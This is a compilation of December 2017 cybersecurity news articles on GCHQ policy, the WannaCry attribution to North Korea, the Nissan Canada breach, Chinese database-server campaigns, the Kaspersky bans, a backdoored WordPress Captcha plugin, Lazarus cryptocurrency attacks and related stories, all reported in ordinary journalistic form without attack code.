"We're spending too much time shouting at users and telling them they're too stupid to do the right thing frankly, and that hasn't worked and we need to get away from that," GCHQ told the Committee. The new approach has been called 'active cyber defense', and "includes GCHQ assisting private companies in developing automated technological solutions to operate on the underlying internet infrastructure that would prevent a large proportion of cyber attacks from ever reaching end-users."

Part of this process can be seen in the National Cyber Security Center (NCSC) which is both GCHQ (still covert) and partly an advice center backed by the skills and knowledge of GCHQ. It's aim, says GCHQ, is "to fuse powerful covert capabilities, accesses, data and skills to help provide cyber defense at scale to the UK."

The Committee asked whether GCHQ should have legal cyber security enforcement powers. GCHQ welcomes the tendency for existing regulatory organizations (such as the Bank of England and the Office of the Nuclear Regulator) to consult with and take advice from the organization; but it is not a supporter of general 'cyber regulatory legislation'. While it is a political decision, it says it is hard to do, difficult to keep up with technology, and problematic across different industry sectors.

The UK has a well-established offensive cyber capability program. GCHQ's ultimate position on the use of offensive capabilities is clear: "International law applies to state acts in cyberspace in the same way as anywhere else." If international law allows a response to kinetic activity, it will allow a response to cyber activity. The committee says that GCHQ's offensive capabilities are "an effective deterrent".

The problem remains 'attribution'. "Further work will be required to develop a better international consensus on the rules of engagement for offensive cyber. GCHQ told us that it supported this concept in principle, but held some concerns, for example about others' adherence to such agreements."

The report highlights four specific cyber adversary states: Russia, China, Iran and North Korea. Russia is the primary concern. "It is possible that Russia is ostentatiously flexing its muscles towards the West under a deliberately thin blanket of deniability, or these may simply be providing a useful public cover for the Russian agencies' practice runs," suggests the report.

The intelligence community is more forthright. "The [Russian] risk appetite is quite different and they are quite prepared to use the world as a range, [saying] 'we will give it a go and see what happens', said Defense Intelligence. "They clearly are operating to risk thresholds which are nothing like those that the West operates," said MI5. Despite this increasing level of mistrust between Russia and the West, the Committee urges "that limited lines of communication should be maintained, although a delicate balance is needed."

China remains a serious cyber threat, attempting to steal data for economic purposes and to acquire classified government and military data. GCHQ notes that since the UK and the U.S. both signed cyber security accords with China (where all sides agreed not to engage in commercial cyber espionage), China is taking more care to disguise attribution.

Iran gets relatively little coverage in the report. "Iranian motivations against the UK are more obscure than those of Russia and China. GCHQ has suggested that Iran is primarily attempting a show of strength."

North Korea is different. Its 'recklessness and unpredictability' is difficult to defend against. "It is prepared to use its capabilities without any concern for attribution, and for ideological motives which are alien to other countries," warns the report.

In international cyber relations, the report unsurprisingly highlights the Five Eyes (the UK, USA, Canada, Australia and New Zealand) as "the closest international intelligence partnership in the world." Bearing in mind that much of the report was compiled either before or during the first few months of the Trump administration, it is interesting to see the extent of UK concern -- even to the extent that it could upset Five Eyes relationships.

"Any significant change in US policies relating to detainee treatment," states the Committee, "would pose very serious questions for the UK-USA intelligence relationship. The US agencies are well aware of the implications for cooperation with the UK and other allies, and the UK Agencies are monitoring the situation closely." In fairness, neither the Committee nor the intelligence community expected this to happen.

Brexit is also a concern for international intelligence relations. While Brexit cannot affect the Five Eyes (none of which, after Brexit, will be part of the European Union), nevertheless is will affect the UK. The Director General of MI5 told the Committee that there were two sides to the problem. National security falls outside of the Lisbon Treaty (the basis of the European Union), and the UK expects to continue working with European intelligence agencies.

What's driving this, he said, is that "Half of Europe is scared of terrorism and the other half is scared of Russia and both halves want us to help them... So that will not change with Brexit because Article 4.2 [of the Lisbon Treaty] had all of that outside scope anyway." But he added that other parts of cyber relations do fall within Lisbon scope, "in areas like data sharing, what happens with borders... what happens with law enforcement cooperation..." All of this is far from decided yet.

GCHQ is more relaxed. Its European partnerships are bilateral, and not connected with any European institutions; "So there is no reason why it would be affected by Brexit." GCHQ is, however, concerned about data sharing and trade with Europe. "The big companies, will need to be able to share data in a way that is legally compliant on... both sides, the UK and the EU. That's a policy issue way beyond intelligence, actually, but it will have big implications for us, so getting that right is important."

Asked for a formal assessment of the effect of Brexit on their operations, both GCHQ and MI5 referred the Committee to the Cabinet Office, saying it was a political matter. The Cabinet Office then declined to respond; and the report registers the Committee's disapproval. "The decision to leave the EU clearly has direct and indirect implications for the work of the Agencies -- and these are well within this Committee's remit."

Much of the report is necessarily concerned with budgets (usually redacted), staffing and premises. However, wherever cyber security, both offensive and defensive, is discussed, the report provides a bullish picture of improving UK capabilities.


Industry Reactions to U.S. Blaming North Korea for WannaCry
22.12.2017 securityweek BigBrothers
The United States, Canada, Japan, Australia and New Zealand have all officially accused North Korea this week of being behind the WannaCry campaign. They join the United Kingdom, which blamed Pyongyang for the attack back in October.

While some security firms pointed the finger at North Korea shortly after the attack, Japan and the Five Eyes countries claim their intelligence agencies reached the same conclusion after conducting their own investigations and sharing data with each other.

North Korea has once again denied the accusations, claiming that Washington was demonising it.

Industry Reactions to U.S. Blaming North Korea for WannaCry

Some industry professionals point to evidence showing that these governments’ assessment is accurate, while others highlight that attribution is a difficult task, and warn that the world is not ready for the next WannaCry.

And the feedback begins...

Benjamin Read, Manager, Cyber Espionage Analysis, FireEye:

“FireEye has found the WannaCry malware shares unique code with WHITEOUT malware that we have previously attributed to suspected North Korean actors. While we have not verified other experts’ observation of known DPRK tools being used to drop early versions of WannaCry, we have not observed other groups use the code present in both WannaCry and WHITEOUT and we do not believe it is available in open source. This indicates a connection between the two.

Our analysis has found this unique code shared across additional North Korean malware, including NESTEGG and MACTRUCK. Significantly, while this code is present in the MACTRUCK malware, it is not used. The shared code likely means that, at a minimum, WannaCry operators share software development resources with North Korean espionage operators.

In addition to the WannaCry activity, we believe that North Korean actors are using multiple vectors to engage in cyber-criminal actively, including, most prominently, the targeting of Bitcoin exchanges. FireEye assess that North Korea will continue to pursue financially motivated cyber intrusion to supplement the government's income.”

Tim Erlin, VP of Product Management and Strategy, Tripwire:

“Accurate attribution for cyber attacks is almost always a difficult task, and it’s doubly so when the evidence leading to the conclusion can’t be shared.

With global public trust in the US government at a low point, it’s not surprising that there’s skepticism. If we’re going to have national security organizations delivering these types of conclusions on attribution to the public, we need to find a way to develop trusted output. The mantra of ‘trust us’ doesn’t cut it here.

This conclusion about North Korea’s culpability isn’t new. The UK discussed the very same conclusion in October, with the very same caveats about sharing the actual evidence. You can’t arrest a nation-state, which inevitably prevents any real closure on an incident like WannaCry.”

Chris Doman, Threat Engineer, AlienVault:

“WannaCry was linked to a group known as Lazarus, which others have linked to North Korea. There were two data points linking WannaCry to Lazarus - a number of rare code overlaps between WannaCry and Lazarus malware, and Symantec saw an early version of WannaCry manually deployed by Lazarus on one of their clients. The US government may have additional information, but the evidence provided at the time by the private sector was pretty strong.

The evidence linking Lazarus to North Korea is similarly strong. There are a very small number of publicly assigned internet addresses assigned to North Korea, and they pop up in Lazarus attacks. The attacks have been dated back to at least 2007, and often contain other clues such as North Korean fonts.

Things take time to come out of the government - but the timing today may have to do with other events. Lazarus have been particularly active recently - I’m seeing numerous new malware samples from them daily. A lot of their current activity involves stealing bitcoin and credit card numbers.”

Dmitri Alperovitch, CTO and Co-founder, CrowdStrike:

“[The US Government’s announcement] of its official public attribution of the WannaCry attack to North Korea regime is another step in establishing the importance for regularly attributing significant attacks to nation-states and criminal groups. It also raises public awareness about North Korea’s growing offensive cyber capabilities. CrowdStrike has tracked DPRK’s cyber activities going back to the mid-2000s, which started with espionage, then half a decade later evolved into destructive attacks and in the last few years delved into cybercrime such as ransomware and bank heists. They are a very capable actor that is known to have developed 0-day exploits and their own unique malware code. As such, they pose a major threat to organizations globally, especially as tensions between the US and North Korea over the nuclear and missile programs continue to escalate.”

Joseph Carson, Chief Security Scientist, Thycotic:

"Cyber attribution is one of the most difficult tasks in cybersecurity today. Unless the devices are persistent, it is almost impossible to identify who was sitting behind the keyboard, let alone who was instructing that person to carry out the malicious activity without any advanced cyber forensics tools. When attribution is pointing to a nation state, it is crucial that the attribution is communicated by the impacted government and not any private company or entity. Private companies should focus on getting back to a secure and operational state and assist in evidence that assist the government in accordance to any compliance requirements. In my experience, when cybercrime crosses international borders, it is difficult to claim attribution without cooperation of the country to where the evidence leads.

The challenge with calling out a group like Lazarus, which is widely believed to be associated with North Korea and several previous cyber-attacks, is that it is important to be clear that this is a group and motives can change depending on who is paying. I have found when researching hacking groups they can one day be working for one government under one alias and another using a different alias. This means that association in cyberspace means nothing. In my experience in digital forensics, I have always followed two rules when analyzing a cyber-crime: follow the motive or follow the money — either one will lead to the criminal.

In both WannaCry and NotPetya it looks like the motive was not financial. To me, it is clear that multiple bad actors played a part in the creation and malicious use of the ransomware. The payload and financial portion of the crime appears to be constructed by two different groups of cybercriminals. Remember, the real purpose of ransomware can be a combination of motives, or involve multiple threat actors with different motives. It is always important to step back and think: if this was your crime how would you have done it? It’s crucial to be able to think and look at the world through the eyes a hacker or cyber-criminal.”

Michael Daly, CTO, Raytheon Cybersecurity and Special Missions:

“The message for any company doing business on the internet is that North Korea sees you as a target. So do other rogue nation-states, and so do transnational crime organizations. For them, ransomware is an irresistible crime. It keeps hundreds of millions of dollars in untraceable cryptocurrency flowing in, all the while causing chaos in places like hospitals, power plants, train stations, financial institutions and telecommunications companies.

It's no coincidence the administration announced its findings in a publication they knew would reach the people who have the power and influence to strengthen networks in the commercial sector. Stronger networks are more expensive to attack, and when we increase the cost of cybercrime, we undermine the incentive for the attack.”

Travis Farral, Director of Security Strategy, Anomali:

“Attributing certain attacks or specific malware to an actor, group, or nation-state is difficult in the cyber world. Often, attribution is made as a best-guess based on available evidence. In the case of WannaCry, a handful of prominent security companies noted clues that pointed to the Lazarus Group, a North Korea associated actor group, as the potential culprits behind the malware. The cited links connecting North Korea to WannaCry have been far from conclusive, however. The U.S. Government claims to have evidence indicating that North Korea was indeed behind WannaCry. They may have such evidence, but because they have not shared the details with the public, it is a case of trusting their judgment on the matter.”

Atif Mushtaq, CEO, SlashNext:

“The interesting thing about malware is that, like any other product that works effectively, it can become widely-adopted. We recently blocked an exploit called “EternalBlue” which takes advantage of a Microsoft Windows Security flaw to gain entry using the network file sharing protocol (TCP ports: 139, 445). Similarities, including infection vectors, code sequences, infrastructure and exploitation techniques, link this to the APT called “Unit 180,” as well as a backdoor program called Contopee, originating from Lazarus, a North Korean hacking group. The core malware gets used but each hacking group modifies their attack strategy in order to evade signature- or sandbox-based detection mechanisms.”

Chris Morales, Head of Security Analytics, Vectra:

“Most industry experts believe that North Korea is engaged in finding alternative means for funding their efforts as they have been cut off from traditional financial channels. When WannaCry was first detected, we saw similarities in the code used for that ransomware attack with previous attacks attributed to North Korea, like the Sony hack. North Korea has been targeting banks directly with banking malware while using ransomware against other organizations to acquire a large volume of Bitcoin. North Korea has benefited greatly from with the meteoric rise in bitcoin over the past year. With the success in financial gain they have received from cybercrime, we can expect to see more.

We anticipate that many more ransomware attacks will continue to occur. They will have different names and use different exploits. What won’t change is the nature of the attacks and their associated behavior. While we don’t know when the next big attack will occur, enterprises need to be ready for it. Ongoing advances in AI have allowed technology to augment the efforts of cybersecurity teams. And there must be a seismic shift in the cybersecurity industry to identify attacker behaviors fast and early to stop ransomware attacks.”

Eddie Habibi, Founder and CEO, PAS:

“While attribution is an important question to answer, the real question is are we prepared for the next WannaCry? The lifeblood of critical infrastructure plants – where electricity is generated, fuel is produced, and drinking water is cleaned – are industrial control systems. They are responsible for process safety, production uptime, and environmental protection. Attacks on these systems have increased seven-fold since 2010, and the bad guys are achieving greater success with every attack.

Even after WannaCry initially hit, many plants had systems that remained unpatched. Just last week, attackers were successful taking control of safety systems in a plant with malware called TRITON/TRISIS. They did not need a vulnerability to assert control; they only needed specific process knowledge and an unprepared plant environment.

The threat landscape is fluid, and risk is increasing for critical infrastructure companies. Traditional IT security controls are not keeping pace with the requirements of operational technology systems, and industries need better methods to increase visibility into their most critical cyber assets – eighty percent of which are largely invisible to security personnel today. The basic fact is, you cannot protect what you cannot see.”


Nissan Finance Canada hacked, 1.13 million customers may have been exposed
22.12.2017 securityaffairs Incindent

Nissan Finance Canada announced on Thursday that the personal information of 1.13 million customers may have been exposed as a result of a data breach.
Nissan Finance Canada has been hacked, personal information of 1.13 million customers may have been exposed as a result of a data breach discovered by the company on December 11 (The biz took 10 days to disclose the incident).

The company notified customers via email the incident, it confirmed that its systems were compromised, with “unauthorized person(s) gaining access to the personal information of some customers that have financed their vehicles through Nissan Canada Finance or Infiniti Financial Services Canada.”

“We apologize for any frustration and anxiety this may cause our customers, and we thank you for your patience and support as we work through this issue.”

Nissan published a quite similar message on its website too, it added that at this time, there is no indication that customers who financed vehicles outside of Canada are affected. According to Nissan Canada, compromised data includes customer names, addresses, vehicle makes and models, vehicle identification numbers (VINs), credit scores, loan amounts and monthly payment figures.

Financial information belonging to the customers, such as payment card data was not affected.

“Nissan Canada Finance (NCF) is notifying its customers in Canada that it is a victim of a data breach that may have involved unauthorized person(s) gaining access to the personal information of some customers that have financed their vehicles through Nissan Canada Finance and INFINITI Financial Services Canada.” states the message published on the company website.

“On December 11, 2017, NCF became aware of unauthorized access to personal information.” “While the precise number of customers affected by the data breach is not yet known, NCF is contacting all of our current and past customers – approximately 1.13 million customers – who have financed their vehicles through Nissan Canada Finance and INFINITI Financial Services Canada.”

Nissan Finance Canada

The company is investigating the attack with the help of law enforcement trying to figure out the extension of the incident and potential impact on its customers.

“We are still investigating precisely what personal information has been impacted,” the company added.

Nissan is offering 12 months of credit monitoring services through TransUnion at no cost.


Chinese crime group targets database servers for mining cryptocurrency
22.12.2017 securityaffairs CyberCrime

Security researchers discovered multiple hacking campaigns conducted by a Chinese criminal gang targeting database servers.
The researchers from the security firm GuardiCore Labs Security have discovered multiple hacking campaigns conducted by a Chinese criminal gang targeting database servers. The attackers targeted systems worldwide for mining cryptocurrencies, exfiltrating sensitive data and building a DDoS botnet.
The experts observed thousands of cyber attacks in recent months and identified at least three attack scheme, Hex, Hanako, and Taylor, targeting MS SQL and MySQL servers running on both Windows and Linux machines.

“In the last few months GuardiCore Labs has been investigating multiple attack campaigns conducted by an established Chinese crime group that operates worldwide.” reads the analysis published by Guardicore.

“The campaigns are launched from a large coordinated infrastructure and are mostly targeting servers running database services. By now we were able to identify three attack variants – Hex, Hanako and Taylor – targeting different SQL Servers, each with its own goals, scale and target services.”

Chinese hackers database servers

The experts pointed out that the three malware are used for different purposes by the criminal group, below are described the attack scenarios:

Hex installs cryptocurrency miners and remote access trojans (RATs) on infected machines;
Taylor installs a keylogger and a backdoor;
Hanako is used to infect systems and recruit them in a DDoS botnet;
The experts observed threat actors mainly launching Taylor attacks, they recorded hundreds of Hex and Hanako attacks and tens of thousands of Taylor attacks each month.

The vast majority of compromised machines are mostly based in China, other infections were discovered in Thailand, the United States, Japan, and others.

Similarly to the Bondnet botnet, victims are re-purposed to help the attackers, making impossible analyzing the source of the attacks.

The researchers noticed that attackers used nearly all the machine for one month before rotate out of use, evidence they collected suggests that the attack group is based in China. The code includes comments in Chinese, the Trojan RAT disguises itself as a popular Chinese program and configuration files list email addresses from popular Chinese providers.

“Determining the scope of the campaign was quite a challenge. The group has shown an ability to generate over 300 unique binaries per each attack and to constantly rotate their attacking machines and domains, while manipulating thousands of victims as part of their attack infrastructure.” continues the analysis.

The hackers powered brute force attacks to gain unauthorized access to the targeted database servers, then run a series of predefined SQL commands to gain persistence and evade audit logs.

The hackers used a network of already compromised systems to power the brute force attacks against the database servers and deliver the malware, in this way they prevented takedown of their infrastructure.

All the malware variants create backdoor users in the database and open the Remote Desktop port, with this technique the attackers can remotely download and install their payloads (i.e. Cryptocurrency miner, Remote Access Trojan (RAT) or a DDoS malware).
“Later in the attack, the attacker stops or disables a variety of anti-virus and monitoring applications by running shell commands.” continues the post.

“The anti-virus targeted is a mixture of well known products such as Avira and Panda Security and niche software such as Quick Heal and BullGuard. As a final step, the attackers attempt to cover their tracks by deleting any unnecessary registry, file and folder entries using batch files and VB scripts.” the researchers wrote in their blog post published Tuesday.”

The attackers use to cover their tracks deleting any unnecessary Windows registry, file, and folder entry using pre-defined batch files and Visual Basic scripts.

Administrators should check for the existence of the following usernames in their database or systems in order to identify if they have been compromised by the Chinese criminal hackers.

Further info is available in the report, including Indicators of Compromise (IoCs).


After US, also Lithuania bans Kaspersky Software due to its alleged link to the Kremlin
22.12.2017 securityaffairs BigBrothers

Lithuania announced it will ban the products of the cyber security giant Kaspersky from computers in critical infrastructure.
After the decision of the US Government for banning Kaspersky software, Lithuania announced it will ban the products of the security giant from computers in critical infrastructure (energy, finance, and transport).

Lithuania is member of the EU and also component of the NATO alliance, it is very critics of Russia, especially after its 2014 annexation of the Crimea peninsula from Ukraine.

“The government… recognised that Kaspersky Lab software is a potential national security threat,” the Lithuanian’s defence ministry said in a statement.

The government will prohibit agencies responsible for “critical infrastructure” from using Kaspersky products and will force them to replace the anti-virus software in “a short while.”

The Russian security software was banned from US government agencies because it was blamed by US intelligence of helping Russian intelligence steal top-secret information.

The Lithuanian intelligence has the same opinion as of the US peers, the Lithuanian intelligence chief Darius Jauniskis recently said Kaspersky “was sometimes acting as a toy in the hands of (Russian President Vladimir) Putin’s administration”.

Kaspersky denied any involvement in cyber espionage activity, the company sued the U.S. Government over product ban, it’s appeal was filed in the U.S. District Court for the District of Columbia.

Kaspersky considers the ban as unconstitutional, according to the company the US Government took the decision to prohibit its products based on reports citing anonymous sources without strong evidence of its involvement in cyber espionage activities.

Kaspersky claims to have offered its support to the DHS for its investigation, but the agency issued the 17-01 directive, banning its security software and services without any warning.

Lithuania bans kaspersky

The decision of the US Government is having a significant impact on the brand reputation with a consequent effect on the sales in almost any sector and any country.

“Through Binding Operational Directive 17-01, DHS has harmed Kaspersky Lab’s reputation, negatively affected the livelihoods of its U.S.-based employees and U.S.-based business partners, and undermined the company’s contributions to the broader cybersecurity community,” said Eugene Kaspersky, CEO and co-founder of Kaspersky Lab.

In December 2016, Lithuania announced to have found Russian spyware on its government computers, the government blamed Moscow for cyber espionage campaigns.

According to the Lithuanian intelligence, Russia powered cyber attacks that hit government networks over the last two years. According to the Reuters, the head of cyber security Rimtautas Cerniauskas confirmed the discovery of at least three Russian spyware on government computers since 2015.


Apple Admits Deliberately Slowing Older iPhones — Here’s Why
21.12.2017 thehackernews Apple


Why is my iPhone slow?
Do you also ask this question again and again?
Well, the biggest conspiracy theory floating around from years that Apple deliberately slows down performance on your older iPhones whenever the company is about to launch the next version of its flagship to push its sale is TRUE (at least partially).
Apple has finally admitted that it does indeed intentionally slow down older iPhone models, without notifying its customers, though the company claims the move is not intended to encourage customers to upgrade to newer iPhone models.
Instead, Apple says it is a feature—implemented on the iPhone 6, 6S and SE last year during a software update, and on the iPhone 7 in December with the release of iOS 11.2—to protect against unexpectedly shutting down of older iPhones due to aging batteries and prolong their lifespan.
"Last year we released a feature for iPhone 6, iPhone 6s and iPhone SE to smooth out the instantaneous peaks only when needed to prevent the device from unexpectedly shutting down during these conditions," the company said in an official statement to Reuters.
"We've now extended that feature to iPhone 7 with iOS 11.2, and plan to add support for other products in the future."
According to Apple, the issue resides in iPhone's battery, and not in its processor. The performance of lithium-ion battery used in iPhones degrades over time, which could result in damaging the internal components of the device.

Therefore, Apple intentionally throttles the performance of iPhones that have older batteries, batteries with low charge or that are cold, in an attempt to protect their components.
The above statement by Apple came in response to a blog post published earlier this week by Toronto-based firm Geekbench developer John Poole, who analyzed the performance of iPhone 6S and iPhone 7 over time.
Poole expected the battery capacity to decrease as they age, but processor performance to stay the same. He found that an iOS update rolled out to fix a 'sudden shutdown' issue was to blame for the decreased performance.
"Users expect either full performance or reduced performance with a notification that their phone is in low-power mode," Poole wrote in a blog post published Monday (18th December).
"This fix creates a third, unexpected state. While this state is created to mask a deficiency in battery power, users may believe that the slow down is due to CPU performance, instead of battery performance, which is triggering an Apple introduced CPU slow-down."
Apparently, this latest Apple's revelation sparked an outcry among Apple fans.
Although the company was not playing a bad trick to push the sale of newer iPhone models by slowing older ones, Apple should show a bit more honesty in a relationship with its customers who call themselves Apple fans.


Hidden Backdoor Found In WordPress Captcha Plugin Affects Over 300,000 Sites
21.12.2017 thehackernews
Vulnerebility

Buying popular plugins with a large user-base and using it for effortless malicious campaigns have become a new trend for bad actors.
One such incident happened recently when the renowned developer BestWebSoft sold a popular Captcha WordPress plugin to an undisclosed buyer, who then modified the plugin to download and install a hidden backdoor.
In a blog post published on Tuesday, WordFence security firm revealed why WordPress recently kicked a popular Captcha plugin with more than 300,000 active installations out of its official plugin store.
While reviewing the source code of the Captcha plugin, WordFence folks found a severe backdoor that could allow the plugin author or attackers to remotely gain administrative access to WordPress websites without requiring any authentication.
The plugin was configured to automatically pull an updated "backdoored" version from a remote URL — https[://]simplywordpress[dot]net/captcha/captcha_pro_update.php — after installation from the official Wordpress repository without site admin consent.

This backdoor code was designed to create a login session for the attacker, who is the plugin author in this case, with administrative privileges, allowing them to gain access to any of the 300,000 websites (using this plugin) remotely without requiring any authentication.
"This backdoor creates a session with user ID 1 (the default admin user that WordPress creates when you first install it), sets authentication cookies, and then deletes itself’" reads the WordFence blog post. "The backdoor installation code is unauthenticated, meaning anyone can trigger it."
Also, the modified code pulled from the remote server is almost identical to the code in legitimate plugin repository, therefore "triggering the same automatic update process removes all file system traces of the backdoor," making it look as if it was never there and helping the attacker avoid detection.

The reason behind the adding a backdoor is unclear at this moment, but if someone pays a handsome amount to buy a popular plugin with a large user base, there must be a strong motive behind.
In similar cases, we have seen how organized cyber gangs acquire popular plugins and applications to stealthy infect their large user base with malware, adware, and spyware.
While figuring out the actual identity of the Captcha plugin buyer, WordFence researchers found that the simplywordpress[dot]net domain serving the backdoor file was registered to someone named "Stacy Wellington" using the email address "scwellington[at]hotmail.co.uk."
Using reverse whois lookup, the researchers found a large number of other domains registered to the same user, including Convert me Popup, Death To Comments, Human Captcha, Smart Recaptcha, and Social Exchange.
What's interesting? All of the above-mentioned domains booked under the user contained the same backdoor code that the WordFence researchers found in Captcha.
WordFence has teamed up with WordPress to patch the affected version of Captcha plug-in and blocked the author from publishing updates, so websites administrators are highly recommended to replace their plugin with the latest official Captcha version 4.4.5.
WordFence has promised to release in-depth technical details on how the backdoor installation and execution works, along with a proof-of-concept exploit after 30 days so that admins get enough time to patch their websites.


Greedy North Korean Hackers Targeting Cryptocurrencies and Point-of-Sale Terminals
21.12.2017 thehackernews BigBrothers

The North Korean hacking group has turned greedy.
Security researchers have uncovered a new widespread malware campaign targeting cryptocurrency users, believed to be originated from Lazarus Group, a state-sponsored hacking group linked to the North Korean government.
Active since 2009, Lazarus Group has been attributed to many high profile attacks, including Sony Pictures Hack, $81 million heists from the Bangladesh Bank, and the latest — WannaCry.
The United States has officially blamed North Korea for global WannaCry ransomware attack that infected hundreds of thousands of computers across more than 150 countries earlier this year.
In separate news, security experts have blamed Lazarus group for stealing bitcoins worth millions from the South Korean exchange Youbit, forcing it to shut down and file for bankruptcy after losing 17% of its assets.
Researchers from security firm Proofpoint have published a new report, revealing a connection between Lazarus Group and a number of multistage cyber attacks against cryptocurrency users and point-of-sale systems.
"The group has increasingly focused on financially motivated attacks and appears to be capitalizing on both the increasing interest and skyrocketing prices for cryptocurrencies," the researchers said. "The Lazarus Group’s arsenal of tools, implants, and exploits is extensive and under constant development."
After analyzing a large number of spear phishing emails with different attack vectors from multiple spear phishing campaigns, researchers discovered a new PowerShell-based reconnaissance implant from Lazarus Group arsenal, dubbed PowerRatankba.
Encryption, obfuscation, functionality, decoys, and command-and-control servers used by PowerRatankba closely resembles the original Ratankba implant developed by Lazarus Group.
The PowerRatankba implant is being spread using a massive email campaign through the following attack vectors:
Windows executable downloader dubbed PowerSpritz
Malicious Windows Shortcut (LNK) files
Several malicious Microsoft Compiled HTML Help (CHM) files
Multiple JavaScript (JS) downloaders
Macro-based Microsoft Office documents
Backdoored popular cryptocurrency applications hosted on fake websites
PowerRatankba, with at least two variants in the wild, acts as a first-stage malware that delivers a fully-featured backdoor (in this case, Gh0st RAT) only to those targeted companies, organizations, and individuals that have interest in cryptocurrency.
"During our research, we discovered that long-term sandboxing detonations of PowerRatankba not running cryptocurrency related applications were never infected with a Stage2 implant. This may indicate that the PowerRatankba operator(s) were only interested in infecting device owners with an obvious interest in various cryptocurrencies," reads the 38-page-long report [PDF] published by Proofpoint.
Once installed, Gh0st RAT allows cybercriminals to steal credentials for cryptocurrency wallets and exchanges.
It's notable that PowerRatankba and Gh0st RAT don't exploit any zero-day vulnerability; instead, Lazarus Group relies on mixed programming practices, like C&C communication over HTTP, use of Spritz encryption algorithm and the Base64-encoded custom encryptor.
"It is already well-known that Lazarus Group has targeted and successfully breached several prominent cryptocurrency companies and exchanges," the researchers say. "From these breaches, law enforcement agencies suspect that the group has amassed nearly $100 million worth of cryptocurrencies based on their value today."
Besides stealing cryptocurrencies, the group was also found infecting SoftCamp point-of-sale (POS) terminals, largely deployed in South Korea, using RatankbaPOS malware for stealing credit card data.
Since RatankbaPOS was sharing same C&C server as the PowerRatankba implant, it is believed that both the implants are linked to Lazarus Group.
The explosive growth in cryptocurrency values has motivated not only traders but also hackers to invest all their time and resources in making digital wealth.
More details about the new malware campaigns run by Lazarus Group can be found in the in-depth report [PDF], titled "North Korea Bitten by Bitcoin Bug—Financially motivated campaigns reveal a new dimension of the Lazarus Group," published by PowerPoint on Wednesday.


Romanian Police Arrest 5 People for Spreading CTB Locker and Cerber Ransomware
21.12.2017 thehackernews
Ransomware  Crime

Romanian police have arrested five individuals suspected of infecting tens of thousands of computers across Europe and the United States in recent years by spreading two infamous ransomware families—Cerber and CTB Locker.
Under Operation Bakovia—a major global police operation conducted by Europol, the FBI and law enforcement agencies from Romanian, Dutch, and the UK—raided six houses in East Romania and made five arrests, Europol said on Wednesday.
Authorities have seized a significant amount of hard drives, external storage, laptops, cryptocurrency mining devices, numerous documents and hundreds of SIM cards during the raid.
One thing to note is that all of the five suspects were not arrested for developing or maintaining the infamous ransomware strains, but for allegedly spreading CTB Locker and Cerber.
Based on CryptoLocker, CTB Locker, aka Critroni, was the most widely spread ransomware families in 2016 and was the first ransomware to use the Tor anonymizing network to hide its command and control servers.
Emerged in March 2016, Cerber ransomware works on ransomware-as-a-service (RaaS) model that helped it to gain widespread distribution, allowing any would-be hacker to spread the malware in exchange for 40% of each ransom amount paid.

While CTB Locker helped criminals made $27 million in ransom, Cerber was ranked by Google as the most criminally profitable ransomware that helped them earned $6.9 million up in July 2017.
As with most ransomware, CTB Locker and Cerber distributors were using the most common attack vectors, such as phishing emails and exploit kits.
"In early 2017, the Romanian authorities received detailed information from the Dutch High Tech Crime Unit and other authorities that a group of Romanian nationals was involved in sending spam messages," Europol said in its press release.
"The spam messages intended to infect computer systems and encrypt their data with the CTB-Locker ransomware aka Critroni. Each email had an attachment, often in the form of an archived invoice, which contained a malicious file. Once this attachment was opened on a Windows system, the malware encrypted files on the infected device."
Although the authorities did not release the actual identities of the arrested individuals yet, Europol released a dramatic video of the arrests, where you can see how armed officers stormed the suspects' residence.


Hackers Targeting Servers Running Database Services for Mining Cryptocurrency
21.12.2017 thehackernews Hacking

Security researchers have discovered multiple attack campaigns conducted by an established Chinese criminal group that operates worldwide, targeting database servers for mining cryptocurrencies, exfiltrating sensitive data and building a DDoS botnet.
The researchers from security firm GuardiCore Labs have analyzed thousands of attacks launched in recent months and identified at least three attack variants—Hex, Hanako, and Taylor—targeting different MS SQL and MySQL servers for both Windows and Linux.
The goals of all the three variants are different—Hex installs cryptocurrency miners and remote access trojans (RATs) on infected machines, Taylor installs a keylogger and a backdoor, and Hanako uses infected devices to build a DDoS botnet.
So far, researchers have recorded hundreds of Hex and Hanako attacks and tens of thousands of Taylor attacks each month and found that most compromised machines are based in China, and some in Thailand, the United States, Japan and others.
To gain unauthorized access to the targeted database servers, the attackers use brute force attacks and then run a series of predefined SQL commands to gain persistent access and evade audit logs.
What's interesting? To launch the attacks against database servers and serve malicious files, attackers use a network of already compromised systems, making their attack infrastructure modular and preventing takedown of their malicious activities.

For achieving persistent access to the victim's database, all three variants (Hex, Hanko, and Taylor) create backdoor users in the database and open the Remote Desktop port, allowing attackers to remotely download and install their next stage attack—a cryptocurrency miner, Remote Access Trojan (RAT) or a DDoS bot.
"Later in the attack, the attacker stops or disables a variety of anti-virus and monitoring applications by running shell commands," the researchers wrote in their blog post published Tuesday.
"The anti-virus targeted is a mixture of well-known products such as Avira and Panda Security and niche software such as Quick Heal and BullGuard."
Finally, to cover their tracks, the attackers deletes any unnecessary Windows registry, file, and folder entry using pre-defined batch files and Visual Basic scripts.
Administrators should check for the existence of the following usernames in their database or systems in order to identify if they have been compromised by the Chinese criminal hackers.
hanako
kisadminnew1
401hk$
Guest
Huazhongdiguo110
To prevent compromise of your systems, researchers advised administrators to always follow the databases hardening guides (provided by both MySQL and Microsoft), rather than just having a strong password for your databases.
"While defending against this type of attacks may sound easy or trivial—'patch your servers and use strong passwords'—we know that 'in real life' things are much more complicated. The best way to minimize your exposure to campaigns targeting databases is to control the machines that have access to the database," the researchers advised.
"Routinely review the list of machines that have access to your databases, keep this list to a minimum and pay special attention to machines that are accessible directly from the internet. Every connection attempt from an IP or domain that does not belong to this list should be blocked and investigated."


Keeper Sues Ars Technica Over Reporting on Critical Flaw
21.12.2017 securityweek
Vulnerebility
Keeper Security has filed a lawsuit against Ars Technica and reporter Dan Goodin over an article covering a serious vulnerability found by a Google researcher in the company’s password manager.

Google Project Zero researcher Tavis Ormandy revealed last week that he had identified a critical vulnerability in the browser extension for the Keeper password manager.

The flaw, very similar to one discovered by the expert just over one year ago in the same application, could have been exploited by hackers to steal passwords stored by the extension if they could convince an authenticated user to access a malicious website.

Keeper Security released a patch within 24 hours of the flaw being reported and there had been no evidence of exploitation in the wild. The vendor highlighted that the security hole only impacted the browser extension and not the Keeper desktop application.

These types of vulnerabilities are often covered by the media, particularly ones found by Ormandy, who is known for discovering critical, easy-to-exploit weaknesses in popular software. However, Keeper Security does not like the article written by Ars Technica Security Editor Dan Goodin on this story and filed a lawsuit against him and his employer.

